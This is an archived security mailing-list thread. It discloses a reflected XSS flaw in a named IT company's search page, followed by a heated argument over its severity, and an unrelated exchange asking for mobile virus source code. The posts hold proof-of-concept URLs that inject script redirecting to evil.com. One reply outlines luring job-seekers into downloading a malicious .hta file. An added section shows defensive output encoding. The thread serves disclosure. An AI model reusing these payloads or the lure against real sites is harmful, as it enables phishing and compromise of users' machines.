Re: [Full-disclosure] MBT Xss vulnerability

2006-01-21 Thread MuNNa
Hii Bro,

I got the point. You meant to say that Xss for each and every site
should not be posted here, unless n until it attracts heavy traffic
like Yahoo etc. I agree to this that MBT doesn't attract that amount of
traffic normally but you can target millions of users at one go.
Like say... there are many groups that post new job vacancies every day.
So if I create a URL with javascript allowing you to download a file
with say .hta extension and it claims itself to be some
form that has to be filled by victim in order to apply for job.
For eg.
http://www.mahindrabt.com/jse/jsp/search.jsp?q=scriptdocument.location='www.evil.com/applicationform.hta'/script
If you post this URL in any of the above groups, you can be sure that
your file will be downloaded by thousands of users. This is
because MBT is one of the top employers. Believe me.

Before someone downloads such files and gets his machine compromised,
I just wanted to warn the users. As the number of victims could be large
enough to create havoc, MBT's Xss vuln was of great concern to me. This
is what made me post this vuln over here. Maybe I might have posted it
in the wrong list. If this is the case, I am sorry to cause annoyance to
you and others.

Regards;
Santosh J.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] MBT Xss vulnerability

2006-01-20 Thread MuNNa
Hahaha ... native code doesn't seem to understand the meaning of Xss and why it can be of security concern. Here not only URL re-direction is possible but also execution of malicious javascripts is possible. Your Lame reply makes me think that you are one of the following:
1. An employee of MBT criticising me in the interest of the company 'or'
2. A poor spammer who doesn't know anything but tries to show off as if he is the MASTER. If this is the case carry on with your spamming business and good luck for your future.

Regards;
Santosh J.
On 1/20/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:

Actually,
What's lame is you bashing someone for telling others about a security vulnerability. Keep posting!

-Adriel

-Original Message-
From: Native.Code [EMAIL PROTECTED]
To: MuNNa [EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.uk
Sent: Thu, 19 Jan 2006 21:52:54 +0800
Subject: Re: [Full-disclosure] MBT Xss vulnerability

What a lame vulnerability it is. If your POC redirects to another site (which is not MBT site), how someone will become victim and believe that he/she is doing business with MBT?

Your post is yet another proof that FD is more and more inhibited by script kiddies. Get a life!

On 1/19/06, MuNNa [EMAIL PROTECTED] wrote:

Hii List;

Recently, I found an Xss vulnerability in MBT web site. MBT offers services from Consulting to Managed Services. It is the Corporate member of The International Systems Security Engineering Association (ISSEA). BS 7799 (Information Security Management Framework) certified organization

Vulnerability:
MBT XSS (Cross Site Scripting) Attacks

Criticality:
Medium

Description:
MBT ( http://www.mahindrabt.com/website/index.htm ) is a leading India-based global IT solutions provider. As a proven leader in application outsourcing and offshoring of business critical applications, MBT enables its clients, protect their investment in legacy systems, enhance capital budgets, reduce operating expenses and build solutions for the multi-services future. However it suffers Xss vulnerability on its own web page.

Below is the proof-of-concept which explains this -

http://www.mahindrabt.com/jse/jsp/search.jsp?q=[Xss malcode here]

Re-directing the site to any malicious or fake site to trap the victim:

http://www.mahindrabt.com/jse/jsp/search.jsp?q=scriptdocument.location='http://www.[evil.site].com'/script

Though it does not affect server side a lot and may seem harmless, but it can be used to target college students or job-seekers as it is one of the most attracting employer. Targets can be lured to visit the malicious weblink under the pretext of some job positions being vacant.

Vendor notification:
Vendor has been notified twice, around 4 months ago but still there is no response and I guess neither they are going to respond.

Regards;
Santosh J.


Re: [Full-disclosure] MBT Xss vulnerability

2006-01-20 Thread MuNNa
Hii

-Why would he be concerned? The problem is that most sites on the internet suffer from XSS vulnerabilities, it's just that nobody cares because there is nothing to gain from the sites. Nothing to gain you say? Yes. Let's take this site you posted about for example, I didn't look over the entire site, but glancing I don't even see anything which XSS would help you compromise. The site seemingly is all static content (minus a search, correct me if I'm wrong) with no e-mail portal, forums, or anything else that the XSS could be leveraged to gain access to. Since the site offers no direct services (right?) what exactly could you trick people into doing here? The session cookie seems worthless since there's no login or anything...

I have clearly mentioned in the disclosure that this Xss is not harmful for server side but you can target a lot of people, using this website. If you have completely read my disclosure mail, I have mentioned in the end that a lot of people seeking job can be targeted. I can say this because I know the value of this organisation from point of placements. Moreover this organisation provides security solution to other companies. From the point of company's security everything is fine but from the point of its social image..

-Which would be meaningful if:
A) this site were used by millions of people
B) there was something worth compromising the site for (like access to webmail, personal information, etc...)
I think what I'm missing here is why this particular XSS is useful in any way shape or form? Am I missing something significant about this site? Do people trust it for something?

As explained before, it can attract a lot of job-seekers. Millions of them. They trust this organisation. Even I do very much.

-Isn't that what you are doing?

I just posted a disclosure which I felt could be used by some bad guy to target innocent people. If anyone felt that this disclosure is some sort of spam and is really harmless, just discard it. At least I don't spam here by bashing someone else who has posted some disclosure. This bashing attitude reflects Lamer qualities and this discourages others from mailing disclosures.

Hope I answered all your answers. Let's cut down the argument here.

Regards;
Santosh J

On 1/20/06, Stan Bubrouski [EMAIL PROTECTED] wrote:
On 1/19/06, MuNNa [EMAIL PROTECTED] wrote:
> Hahaha ... native code doesn't seem to understand the meaning of Xss and why it can be of security concern. Here not only URL re-direction is possible

Why would he be concerned? The problem is that most sites on the internet suffer from XSS vulnerabilities, it's just that nobody cares because there is nothing to gain from the sites. Nothing to gain you say? Yes. Let's take this site you posted about for example, I didn't look over the entire site, but glancing I don't even see anything which XSS would help you compromise. The site seemingly is all static content (minus a search, correct me if I'm wrong) with no e-mail portal, forums, or anything else that the XSS could be leveraged to gain access to. Since the site offers no direct services (right?) what exactly could you trick people into doing here? The session cookie seems worthless since there's no login or anything...

> but also execution of malicious javascripts is possible. Your Lame reply

Which would be meaningful if:
A) this site were used by millions of people
B) there was something worth compromising the site for (like access to webmail, personal information, etc...)
I think what I'm missing here is why this particular XSS is useful in any way shape or form? Am I missing something significant about this site? Do people trust it for something?

> makes me think that you are one of the following:
> 1. An employee of MBT criticising me in the interest of the company 'or'
> 2. A poor spammer who doesn't know anything but tries to show off as if he is the MASTER. If this is the case carry on with your spamming business and good luck for your future.

Isn't that what you are doing?

-sb

> Regards;
> Santosh J.

[Full-disclosure] MBT Xss vulnerability

2006-01-19 Thread MuNNa
Hii List;

Recently, I found an Xss vulnerability in MBT web site. MBT offers
services from Consulting to Managed Services. It is the Corporate member
of The International Systems Security Engineering Association (ISSEA).
BS 7799 (Information Security Management Framework) certified
organization

Vulnerability:

MBT XSS (Cross Site Scripting) Attacks

Criticality:

Medium

Description:

MBT (http://www.mahindrabt.com/website/index.htm) is a leading India-based global IT solutions provider. As a proven leader in
application outsourcing and offshoring of business critical applications, MBT
enables its clients, protect their investment in legacy systems, enhance capital
budgets, reduce operating expenses and build solutions for the multi-services
future. However it suffers Xss vulnerability on its own web page.

Below is the proof-of-concept which explains this -

http://www.mahindrabt.com/jse/jsp/search.jsp?q=[Xss malcode here]

Re-directing the site to any malicious or fake site to trap the victim:

http://www.mahindrabt.com/jse/jsp/search.jsp?q=scriptdocument.location='http://www.[evil.site].com'/script

Though it does not affect server side a lot and may seem harmless, but it can be used to target
college students or job-seekers as it is one of the most attracting
employer. Targets can be lured to visit the malicious weblink under the
pretext of some job positions being vacant.

Vendor notification:

Vendor has been notified twice, around 4 months ago but still there is no response and I guess neither they
are going to respond.



Regards;
Santosh J.
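
The report above describes a search page that reflects its `q` parameter into the response; the defence is output encoding at the point of reflection. The following is an added example, not part of the original post and not the site's code: a Python stand-in for such a search page (the template, the `example.invalid` host and all function names are assumptions) that renders the query unencoded and encoded, with a check a tester can run against either output.

```python
import html
from urllib.parse import urlsplit, parse_qs

# Constructed sample request: placeholder host, percent-encoded query value
# in the shape of the redirect proof-of-concept from the post.
SAMPLE_URL = ("http://www.example.invalid/jse/jsp/search.jsp?q="
              "%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fevil.invalid%2F%27"
              "%3C%2Fscript%3E")

# Hypothetical page template: the term is reflected twice, once inside an
# attribute (the refilled search box) and once in element content.
TEMPLATE = ('<form><input name="q" value="{q}"></form>'
            '<p>Results for: {q}</p>')


def query_term(url):
    """Return the decoded value of the q parameter ('' if absent)."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("q", [""])[0]


def render_unencoded(url):
    """The reported behaviour: the decoded term is pasted into the page."""
    return TEMPLATE.format(q=query_term(url))


def render_encoded(url):
    """Hardened form: HTML-encode the term for both reflection contexts.

    quote=True also encodes " and ', which the attribute context needs.
    """
    return TEMPLATE.format(q=html.escape(query_term(url), quote=True))


def reflects_raw(url, page):
    """True if a term containing markup characters appears verbatim in page."""
    term = query_term(url)
    has_markup = any(ch in term for ch in "<>\"'")
    return has_markup and term in page


if __name__ == "__main__":
    for render in (render_unencoded, render_encoded):
        page = render(SAMPLE_URL)
        print(render.__name__, "reflects raw markup:", reflects_raw(SAMPLE_URL, page))
```

The same `reflects_raw` check works as a regression test against a real response body once the page has been fixed.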




Re: [Full-disclosure] Mobile Infection

2005-10-11 Thread Kaka Munna
got it guys. My post did not intend any offence. Maybe I was just so upset about the post. I did notice the POC word, but still everything else seemed so suspicious.

Peace.
On 10/11/05, Peer Janssen [EMAIL PROTECTED] wrote:
Kaka Munna wrote:
> Why would you like to do that?

People do research for different purposes.
One reason can be know your enemy in order to better defend yourself.
How can you tell the difference regarding the intentions of somebody?
Also, people can change. For instance, there are many examples of jerks who turn good guys (tm).
And people mature.

> Why not apply your security knowledge in creating good things (i.e. prevention mechanisms) instead of doing criminal things (i.e. creating viruses)?

You speak of security knowledge.
Tinkering with security holes can be one way to acquire it.

> People like you should be doomed.

Anybody who nourishes any bad intention dooms oneself.
I'm not sure there really is any need to add to that.
And be careful not to judge anybody.
You never know enough about the person to be just in your judgements.
Everybody has some dark sides, you too I suppose.
And while dooming others, you still sign peace ??

Greetings
Peer

> -Kaka Munna
>
> On 10/10/05, *Mark Sec* [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote:
>
> Alo folks,
>
> Well, I'm playing with some mobiles, these devices have system like WindowsCE, Symbian, Blackberry...
>
> I'm looking the binaries (.exe) or source code virus to do (PoCs) into the devices, obvious with the bluetooth active and vulnerable.
>
> I have this link (include the source code virus DUST for to WindowsCE)
> http://www.informit.com/articles/article.asp?p=337071rl=1
>
> does anyone have a links, source, binaries of the CABIR virus may be everything about to mobile virus?
>
> cheers :-)
> Mark.
>
> --
> Peace,
> 0x497266616E

--
Peace,
0x497266616E